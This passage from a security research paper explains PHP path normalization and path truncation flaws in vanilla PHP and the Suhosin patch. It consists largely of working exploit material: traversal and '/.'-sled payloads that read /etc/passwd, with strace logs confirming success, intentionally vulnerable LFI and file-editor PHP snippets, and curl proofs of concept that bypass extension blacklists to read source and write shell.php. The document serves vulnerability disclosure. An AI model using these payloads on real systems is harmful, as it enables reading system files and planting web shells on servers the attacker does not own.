TSRM/tsrm_virtual_cwd.c-82:#define TOKENIZER_STRING "/\\"
TSRM/tsrm_virtual_cwd.c-103:#define TOKENIZER_STRING "/\\"
TSRM/tsrm_virtual_cwd.c-106:#define TOKENIZER_STRING "/"

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The define at line 82 is for WIN32, the one at line 103 is for NETWARE,
the last is for all the other systems.

The functions IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined as
below.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ grep -P "#define (IS_DIRECTORY_UP *\(|IS_DIRECTORY_CURRENT *\()" */*
-n -C2 | head -6
TSRM/tsrm_virtual_cwd.c-91:#define IS_DIRECTORY_UP(element, len) \
TSRM/tsrm_virtual_cwd.c-92: (len >= 2 && !php_check_dots(element, len))
[..]
TSRM/tsrm_virtual_cwd.c-94:#define IS_DIRECTORY_CURRENT(element, len) \
TSRM/tsrm_virtual_cwd.c-95: (len == 1 && element[0] == ‘.’)

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Although the code is simple to understand, here are the reasons of the
normalization error:

The if/else-if construct does not contemplate a failure of both cases
and tsrm_strtok_r() will split the path at every "/".

Then it analyzes every splitted string, returning false for all the
condition statements with the effect that at every "while" cycle all
the checks are ignored.

This is why "./" is "neutral" and will not appear in the normalized
path. The analysis for "/." is identical.

Now it remains to see why, using the Suhosin patch, a sequence of "/"
becomes a working attack vector.

We have done our tests using suhosin-patch-5.2.8 [7].

In the patch, at line 34, there is a definition of a new php_realpath()
function, and at line 1746, a "#define realpath php_realpath".

So the patch replaces the entire vanilla realpath() function with
this own implementation.

This function, called by the virtual_file_ex() at line 561, does some
checks on the path and returns a resolved path.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

TSRM/tsrm_virtual_cwd.c-561: if (!realpath(path, resolved_path)) {
TSRM/tsrm_virtual_cwd.c-562: if (use_realpath == CWD_REALPATH) {
TSRM/tsrm_virtual_cwd.c-563: return 1;
TSRM/tsrm_virtual_cwd.c-564: }
TSRM/tsrm_virtual_cwd.c-565: goto no_realpath;
TSRM/tsrm_virtual_cwd.c-566: }

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Let's compare the behaviuor with and without Suhosin patch with the
testcase:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'include("/etc/passwd/////////");'

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

With vanilla sources the function realpath() returns false and the code
jumps to no_realpath using a goto statement: PHP will use the real path
(just the path variable without any change) instead of the resolved path.

This means that "/etc/passwd////////////" will be used and the testcase
will fail with:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Warning: include(/etc/passwd////////////): failed to open stream: Not a
directory

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Instead, using Suhosin patched sources the function returns true, so it
will use resolved_path of suhosin's realpath() function that will
normalize the string to "/etc/passwd".

Suhosin chooses to remove trailing "/" and that's a dangerous error (it
does not prevent the "/." vector from working and opens another hole).

V) PHP filesystem functions path truncation attack

The attack disclosed by barbarianbob is really amazing and makes a
different use of the previously presented vector (path normalization).

He discovered in [1] that the path is "truncated" at a certain point.
This is really amazing because it means that when including a filename
longer than a certain length only the first part, the one that fits the
buffer, will reach the real syscalls.

Why is this of help? Think of a code similiar to the following:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

// I'm a classic LFI (Local File Inclusion) vulnerabiltiy!
include("includes/".$_GET['library'].".php");

?>

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The attacker can control the central part of the included filename,
since there is a fixed prefix RFI (Remote File Inclusion) cannot be
performed (since it would require a protocol/uri handler to be
provided to PHP plus the relatively new php.ini directives
"allow_url_fopen" and "allow_url_include" on "On").

Commonly this can be exploited with a path traversal attack trying to
include an attacker's controlled .php file (and this requires some sort
of ability to control/create the target file, including its filename).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

For example:

?library=../../../home/www.uploadsite_on_shared_hosting.tld/www/static/attack

Will evaluate to:

include("includes/../../../home/www.uploadsite_on_shared_hosting.tld/www/static/attack.php");

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This is not a common situation, especially when doing LFI2RCE attacks
as shown in [5] (Local File Inclusion to Remote Code Execution attacks
are when a LFI can be automatically exploited into an RCE finding a way
to put an attacker controlled payload on the target filesystem in an
existing file, like a logfile, and then including it).

Normally to mount a succesfull LFI attack the attacker must control the
end of the path, since filesystem functions in PHP normally are not
binary safe a nullbyte can be used.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

For example:

?library=../../../var/log/something.log%00

Will evaluate to:

include("includes/".urldecode("../../../var/log/something.log%00").".php");

That is equivalent to:

include("includes/../../../var/log/something.log");

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The common problem with this is that magic_quotes escape nullbytes as
addslashes() is implicitly called on all GPC and SERVER inputs.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -r 'echo addslashes(chr(0));'
\0

That evaluates to something like:

$ php -r 'echo
("includes/".addslashes(urldecode("../../../var/log/something.log%00")).".php");'
includes/../../../var/log/something.log\0.php

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As a side note magic_quotes_gpc will be removed in the upcoming PHP 6
release.

Now let's come back to the path truncation, what if there's the
possibility to make the appended string slip out of the buffer?

This doesn't happen for the C language nullbyte string termination as
incorrectly said in [2] and [3] but for the following code:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

# grep "snprintf(trypath, MAXPATHLEN, \"%s/%s\", ptr, filename);" * -R
main/streams/plain_wrapper.c: snprintf(trypath, MAXPATHLEN, "%s/%s",
ptr, filename);
main/fopen_wrappers.c: snprintf(trypath, MAXPATHLEN, "%s/%s",
ptr, filename);

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As you can see PHP, instead of raising an error silently, truncates the
string to MAXPATHLEN chars.

The length at wich the path was truncated has been correctly
investigated in [3] and the related code is the following:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

/main/php.h:

#ifndef MAXPATHLEN
# ifdef PATH_MAX
# define MAXPATHLEN PATH_MAX
# elif defined(MAX_PATH)
# define MAXPATHLEN MAX_PATH
# else
# define MAXPATHLEN 256
# endif
#endif

/win32/param.h

#ifndef MAXPATHLEN
# define MAXPATHLEN _MAX_PATH
#endif

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

And is 4k on most systems.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

strace -e open php -r
'include("includes/".addslashes(urldecode("../../../tmp/something".str_repeat("foo_",
1200)))."/append.php");'
open("/usr/tmp/somethingfoo_foo_foo_foo_foo_foo_[OMIT]foo_foo_f",
O_RDONLY) = -1 ENAMETOOLONG (File name too long)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Will result in ENAMETOOLONG but this limitation of glibc can be overcame
using directories.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

strace -e open -s 100000 php -r
'include("includes/".addslashes(urldecode("../../../tmp/something".str_repeat("foo/",
1200)))."/append.php");'
open("/usr/tmp/somethingfoo/foo/foo/foo/foo/foo/[OMIT]foo/foo/f",
O_RDONLY) = -1 ENOENT (No such file or directory)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This alone can't be helpful to mount an attack because somebody should
be able to create a deeply nested directory structure and the offending
file with an arbitrary filename at the end. An attacker with such
ability could simply create a file that fits the initial needs of the
appended string.

This is an example where the path normalization vector comes in help and
can be combined with the path truncation issue to achieve a greater goal
(nullbyte emulation on magic_quotes_gpc enabled systems).

The sled after the payload, containing the directory traversal path and
the offending filename, must be one of the already seen path normalization
attack verctors (eg: "/" or "/." repeated many times). Doing something
is like filling the buffer until MAXPATHLEN of something that will
disappear before the actual open() syscall.

Slashes normalization happens on PHP vanilla; here they count as chars
in the
truncation code but are still normalized to a single / causing the
ENOTDIR error.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ strace -e open php -r
'include("a/../../../../tmp/teest".str_repeat("//",
2027)."append.inc");' 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest/ap”, O_RDONLY) = -1 ENOTDIR (Not a directory)
open(“/tmp/teest/app”, O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r
‘include(“a/../../../../tmp/teest”.str_repeat(“//”,
2027).”/append.inc”);’ 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest/a”, O_RDONLY) = -1 ENOTDIR (Not a directory)
open(“/tmp/teest/ap”, O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r
‘include(“a/../../../../tmp/teest”.str_repeat(“//”,
2027).”//append.inc”);’ 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest/”, O_RDONLY) = -1 ENOTDIR (Not a directory)
open(“/tmp/teest/a”, O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r
‘include(“a/../../../../tmp/teest”.str_repeat(“//”,
2027).”///append.inc”);’ 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest/”, O_RDONLY) = -1 ENOTDIR (Not a directory)
open(“/tmp/teest/”, O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r
‘include(“a/../../../../tmp/teest”.str_repeat(“//”,
2027).”////append.inc”);’ 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest/”, O_RDONLY) = -1 ENOTDIR (Not a directory)
open(“/tmp/teest/”, O_RDONLY) = -1 ENOTDIR (Not a directory)

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Instead /. normalization is transparent and no char is appended to the
resulting path.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ strace -e open php -r
'include("a/../../../../tmp/teest".str_repeat("/.",
2027)."append.inc");' 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest/.ap”, O_RDONLY) = -1 ENOTDIR (Not a directory)
open(“/tmp/teest/.app”, O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r
‘include(“a/../../../../tmp/teest”.str_repeat(“/.”,
2027).”/append.inc”);’ 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest/a”, O_RDONLY) = -1 ENOTDIR (Not a directory)
open(“/tmp/teest/ap”, O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace -e open php -r
‘include(“a/../../../../tmp/teest”.str_repeat(“/.”,
2027).”/.append.inc”);’ 2>&1 | grep “^open(\”/tmp”
open(“/tmp/teest”, O_RDONLY) = 3
(it works, bingo!)

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Remember that:

- On vanilla PHP versions the last char of the path must be a dot for
the reasons explained above.

- On patched PHP versions adjacent slashes are normalized in a different
way and they work as the universal "/." path normalization vector.

VI) PHP filesystem functions path truncation attack details

Some of you may have noted that there are two open() calls
("/tmp/teest/a" and "/tmp/teest/ap") that show different arithmetic
calculations (one has only one char of the appended string, the other
two chars).

Others may also ask why a relative path, that starts with a directory
that doesn't exist, really works.

This is because of the many (evil) normalization instructions and
routines implemented in PHP in conjunction with a feature: include_path.

include_path is a feature of PHP similar to the PATH on unix systems,
when an include, include_once, require or require_once call is made if
the file is relative (eg: doesn't begin with a slash or a drive letter
on Windows) a lookup will happen in every path defined in include_path.

include_path is defined both at ./configure time and in the php.ini or
at runtime with ini_set("include_path" ..) and defaults to ".:".

Most distributions and vendors dispach PHP with different settings.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

(on Gentoo)
include_path = ".:/usr/share/php5:/usr/share/php"

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The important thing when using the universal normalization vector is
that at last one path is even and at last one is odd. The following
is a complete strace of what happens:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ strace php -r 'include("a/../../../../etc/passwd".str_repeat("/.",
2027)."/.append.inc");' 1>/dev/null

getcwd(“/home/antani”…, 4096) = 13
time(NULL) = 1232724170
lstat64(“/usr”, {st_mode=S_IFDIR|0755, st_size=560, …}) = 0
lstat64(“/usr/share”, {st_mode=S_IFDIR|0755, st_size=9984, …}) = 0
lstat64(“/usr/share/php5″, {st_mode=S_IFDIR|0755, st_size=88, …}) = 0
lstat64(“/usr/share/php5/a”, 0x5edafcdc) = -1 ENOENT (No such file or
directory)
open(“/etc/passwd/”, O_RDONLY) = -1 ENOTDIR (Not a directory)
time(NULL) = 1232724170
lstat64(“/usr”, {st_mode=S_IFDIR|0755, st_size=560, …}) = 0
lstat64(“/usr/share”, {st_mode=S_IFDIR|0755, st_size=9984, …}) = 0
lstat64(“/usr/share/php”, {st_mode=S_IFDIR|0755, st_size=72, …}) = 0
lstat64(“/usr/share/php/a”, 0x5edafcdc) = -1 ENOENT (No such file or
directory)
open(“/etc/passwd”, O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, …}) = 0
read(3, “root:x:0:0:root:/root:/bin/bash\nb”…, 8192) = 3379
read(3, “”…, 8192) = 0
read(3, “”…, 8192) = 0
close(3) = 0

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As we are going to demonstrate, this attack is only possible thanks to
the include_path feature and a specially crafted payload able to
trigger it.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ strace php -r 'include("etc/passwd/.");' 1>/dev/null
(relative lookup to cwd, eg: open of /home/antani/etc/passwd, then
include_path lookups)

$ strace php -r ‘include(“etc/passwd”.str_repeat(“/.”,
2067).”/.append.inc”);’ 1>/dev/null
(no relative lookup (!!), then include_path lookups)

$ strace php -r ‘include(“../../../etc/passwd”.str_repeat(“/.”,
2067).”/.append.inc”);’ 1>/dev/null
(complete failure)

$ strace php -r ‘include(“a/../../../etc/passwd”.str_repeat(“/.”,
2067).”/.append.inc”);’ 1>/dev/null
(unexisting relative directory “a” in include_path paths, but ends
opening /usr/etc/passwd cause it doesn’t traverse enought)
getcwd(“/home/antani”…, 4096) = 13
time(NULL) = 1232728270
lstat64(“/usr”, {st_mode=S_IFDIR|0755, st_size=560, …}) = 0
lstat64(“/usr/share”, {st_mode=S_IFDIR|0755, st_size=9984, …}) = 0
lstat64(“/usr/share/php5″, {st_mode=S_IFDIR|0755, st_size=88, …}) = 0
lstat64(“/usr/share/php5/a”, 0x5a9460cc) = -1 ENOENT (No such file or
directory)
open(“/usr/share/etc/passwd/”, O_RDONLY) = -1 ENOENT (No such file or
directory)
time(NULL) = 1232728270
lstat64(“/usr”, {st_mode=S_IFDIR|0755, st_size=560, …}) = 0
lstat64(“/usr/share”, {st_mode=S_IFDIR|0755, st_size=9984, …}) = 0
lstat64(“/usr/share/php”, {st_mode=S_IFDIR|0755, st_size=72, …}) = 0
lstat64(“/usr/share/php/a”, 0x5a9460cc) = -1 ENOENT (No such file or
directory)
open(“/usr/share/etc/passwd”, O_RDONLY) = -1 ENOENT (No such file or
directory)

$ strace php -r ‘include(“a/../../../../etc/passwd”.str_repeat(“/.”,
2067).”/.append.inc”);’ 1>/dev/null
(unexisting relative directory “a” in include_path paths, correctly open
/etc/passwd)
[..]
open(“/etc/passwd/”, O_RDONLY) = -1 ENOTDIR (Not a directory)
[..]
open(“/etc/passwd”, O_RDONLY) = 3

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

So the payload has to start with a non-existing directory, continue with
the traversal sled, point to the path to include and end with the
normalization/truncation sled. Please refer to the VIII section (POC
and attack code) for more compact POC code.

Here is a final demostration on how this truncation issue works, thanks
to include_path and to the length of the path defined:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ cat phpini_1
[PHP]
include_path = ".:/tmp/1234:/tmp/123"

$ cat phpini_2
[PHP]
include_path = ".:/tmp/123:/tmp/1234"

$ strace php -n -c phpini_1 -r
'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");'
getcwd("/home/antani"..., 4096) = 13
time(NULL) = 1232730352
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/1234", 0x5b3ad18c) = -1 ENOENT (No such file or
directory)
open("//etc/passwd/.appen", O_RDONLY) = -1 ENOTDIR (Not a directory)
time(NULL) = 1232730352
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/123", 0x5b3ad18c) = -1 ENOENT (No such file or
directory)
open("//etc/passwd/.append", O_RDONLY) = -1 ENOTDIR (Not a directory)

$ strace php -n -c phpini_2 -r
'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");'
getcwd("/home/antani"..., 4096) = 13
time(NULL) = 1232730409
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/123", 0x5f5a491c) = -1 ENOENT (No such file or
directory)
open("//etc/passwd/.append", O_RDONLY) = -1 ENOTDIR (Not a directory)
time(NULL) = 1232730409
lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
lstat64("/tmp/1234", 0x5f5a491c) = -1 ENOENT (No such file or
directory)
open("//etc/passwd/.appen", O_RDONLY) = -1 ENOTDIR (Not a directory)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

>From our analysis it turned out that the path truncation attack can
work only if include_path contains at last one absolute path; this means
that while vendor releases are mostly vulnerable, systems with the
default commented include_path configuration are not affected at all.

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ strace php -n -d include_path=".:" -r
'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");'
(doesn't work)

$ strace php -n -d include_path=".:/tmp" -r
'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");'
(works)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Ending path truncation on latest PHP is possible and all the LFI
exploits that make use of the nullbyte technique can now be rewritten
in order to use the techniques exposed in this paper.

VII) The facts

The following section includes some tecnical examples for boh vanilla
and patched PHP.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

strace -e getcwd,lstat64,open php -r 'file_get_contents("runme");';

getcwd("/home/antani"..., 4096) = 13
lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0
lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0
lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0
open("/home/antani/runme", O_RDONLY) = 3

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

strace -e getcwd,lstat64,open php -r 'file_get_contents("runme/");';

getcwd("/home/antani"..., 4096) = 13
lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0
lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0
lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0
open("/home/antani/runme/", O_RDONLY) = -1 ENOTDIR (Not a directory)

Warning: file_get_contents(runme/): failed to open stream: Not a
directory in Command line code on line 1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

strace -e getcwd,lstat64,open php -r 'file_get_contents("runme/.");';

getcwd("/home/antani"..., 4096) = 13
lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0
lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0
lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0
open("/home/antani/runme", O_RDONLY) = 3

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As visible with PHP, opening "runme/." or "runme/./." is the same as
opening "runme". This leads to interesting considerations and security
issues.

I informally spoke about this to Kuza55 and Wisec in April 2007 [4] but
the analisys was incorrect.

We also made some checks to see if this was filesystem dependent and we
found it was not (it's filesystem independent).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

#!/bin/sh
mkdir "/fs_""$1""_mount"
dd if=/dev/zero of="fs_""$1" bs=1M count=10
mkfs -t "$1" "fs_""$1"
mount "fs_""$1" "/fs_""$1""_mount" -t "$1" -o loop

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Test and analisys for "PHP 5.2.8-pl1-gentoo"

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -v
PHP 5.2.8-pl1-gentoo (cli) (built: Jan 21 2009 15:57:44)
Copyright (c) 1997-2008 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

DOESN'T WORK
$ strace php -r 'include("/etc/passwd/");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
write(1, "\nWarning: include(/etc/passwd/): "..., 103) = 103
Warning: include(/etc/passwd/): failed to open stream: Not a directory
in Command line code on line 1

WORKS
$ strace php -r 'include("/etc/passwd/.");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0

WORKS
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2048})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/etc/passwd", O_RDONLY) = 3

WORKS
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2028})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/etc/passwd", O_RDONLY) = 3

DOESN'T WORK
$ test="a/../../../etc/passwd"$(printf '/%.0s' {1..4062})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)

DOESN'T WORK
$ test="a/../../../../etc/passwd"$(printf '/%.0s' {1..4063})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Summary for "5.2.8-pl1-gentoo without any patch:

- Appending / to a file does not work.
(While will work for patched PHP versions as shown below)

- Appending /. to a file works!
Bypasses blacklist filters.

- Appending many / to a file doesn't work!
(While will work for patched PHP versions as shown below)

- Appending many /. to a file works!
Bypasses blacklist filters and CAN be used for path truncation!

Test and analisys for "5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ php -v
PHP 5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3 (cli) (built: Jan 21
2009 15:19:02)
Copyright (c) 1997-2008 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH

WORKS
$ strace php -r 'include("/etc/passwd/");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0

WORKS
$ strace php -r 'include("/etc/passwd/.");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0

DOESN'T WORK (2048*2 is too much and Suhosin block it)
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2048})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
ALERT - Include filename ([OMIT]) is too long (attacker [OMIT]

WORKS! (Tweaked number of /.! Also note the absence of [lf]stat64 calls)
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2028})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/etc/passwd", O_RDONLY) = 3

DOESN'T WORK
$ test="a/../../../.../etc/passwd"$(printf '/%.0s' {1..4062})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/usr/.../etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or
directory)
open("/usr/.../etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or
directory)

DOESN'T WORK
$ test="a/../../../.../etc/passwd"$(printf '/%.0s' {1..4063})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
ALERT - Include filename ([OMIT]) is too long (attacker [OMIT]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Summary for "5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3":

- Appending / to a file works!
Bypasses blacklist filters.

- Appending /. to a file works!
Bypasses blacklist filters.

- Appending many / to a file works!
Bypasses blacklist filters but CAN'T be used for path truncation.

- Appending many /. to a file works!
Bypasses blacklist filters and CAN be used for path truncation!

So our universal file truncation attack for PHP works also on Suhosin.

VIII) POC and attack code

- Blacklist extension check for reading

This POC will expose the bypass of a file viewer that blacklists certain
file extensions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

if (substr($_GET['file'], -4, 4) != '.php')
echo file_get_contents($_GET['file']);
else
echo 'You are not allowed to see source files!'."\n";

?>

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This would be normally not exploitable, but with the exposed techniques
it is.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ curl
"http://localhost/poc_blacklist_bypass_read.php?file=poc_blacklist_bypass_read.php"
You are not allowed to see source files!

$ curl
"http://localhost/poc_blacklist_bypass_read.php?file=poc_blacklist_bypass_read.php/."
[OMISSION, the application source, a quine!]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As you can see appending the neutral "/." token successfully tricks the
check.

- Blacklist extension check for writing (online file editors, etc.)

This POC will expose the bypass of an online file editor that
blacklists certain file extensions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

if (
isset($_POST['file']) &&
substr($_POST['file'], -4, 4) != '.php' &&
isset($_POST['text'])
)
echo file_put_contents($_POST['file'], $_POST['text']);
else
echo 'You are not allowed to edit or create source files!'."\n";

?>

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Exploitation is similar to the previous POC.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ curl "http://localhost/poc_blacklist_bypass_edit.php" \
-d "file=shell.php&text=antani"
You are not allowed to edit or create source files!

$ curl "http://localhost/poc_blacklist_bypass_edit.php" \
-d "file=shell.php/.&text=antani"
6

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

